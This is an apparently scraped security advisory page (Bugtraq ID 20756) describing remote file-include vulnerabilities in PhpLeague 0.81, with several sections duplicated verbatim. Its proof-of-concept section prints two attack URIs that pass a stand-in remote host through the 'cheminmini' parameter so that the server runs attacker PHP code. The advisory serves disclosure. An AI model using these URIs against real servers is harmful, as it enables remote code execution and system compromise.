PHP League Multiple Remote File Include Vulnerabilities
BID:20756
Info
PHP League Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 20756 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 26 2006 12:00AM |
| Updated: | Dec 07 2006 08:39PM |
| Credit: | ajaan and double0 are credited with the discovery of these vulnerabilities. |
| Vulnerable: |
PhpLeague - Univert PhpLeage 0.81 |
| Not Vulnerable: | |
Discussion
PHP League Multiple Remote File Include Vulnerabilities
Php League is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Version 0.81 is vulnerable to these issues; other versions may also be affected.
Php League is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
Version 0.81 is vulnerable to these issues; other versions may also be affected.
Exploit / POC
PHP League Multiple Remote File Include Vulnerabilities
Attackers can exploit this issue via a web client.
The following proof-of-concept exploit code and URIs are available:
http://www.example.com/consult/miniseul.php?cheminmini=http://www.example2.com
http://www.example.com/config.php?cheminmini=http://www.example2.com
Attackers can exploit this issue via a web client.
The following proof-of-concept exploit code and URIs are available:
http://www.example.com/consult/miniseul.php?cheminmini=http://www.example2.com
http://www.example.com/config.php?cheminmini=http://www.example2.com
Solution / Fix
PHP League Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
PHP League Multiple Remote File Include Vulnerabilities
References:
References:
- Vendor Home Page (PhpLeague - Univert)